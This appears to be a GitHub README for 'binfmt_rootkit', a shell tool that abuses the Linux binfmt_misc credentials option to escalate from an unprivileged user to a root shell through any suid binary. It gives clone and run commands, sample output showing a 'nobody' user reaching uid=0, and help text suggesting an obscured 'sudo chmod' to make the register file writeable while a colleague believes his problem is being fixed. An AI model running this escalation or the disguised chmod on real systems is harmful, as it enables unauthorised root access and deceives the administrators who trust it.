/binfmt_misc

Kernel Support for miscellaneous (your favourite) exploits

Primary LanguageShellGNU General Public License v3.0GPL-3.0

binfmt_misc

Kernel Support for miscellaneous (your favourite) exploits

No breakthrough here, just some trivia involving binary formats.

binfmt_rootkit

Poor man's rootkit, leverage binfmt_misc's credentials option to escalate privilege through any suid binary (and to get a root shell) if /proc/sys/fs/binfmt_misc/register is writeable.

$ git clone https://github.com/plcp/binfmt_misc
$ cd binfmt_misc
$ ./binfmt_rootkit --help
Usage: ./binfmt_rootkit
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave
    is thinking that you are fixing his problem.

Cheap nobody to root is cheap:

$ sudo -u nobody ./binfmt_rootkit
uid=0(root) euid=0(root)
sh-4.4#

Tested on Linux 4.9.6-1 and working with major distributions.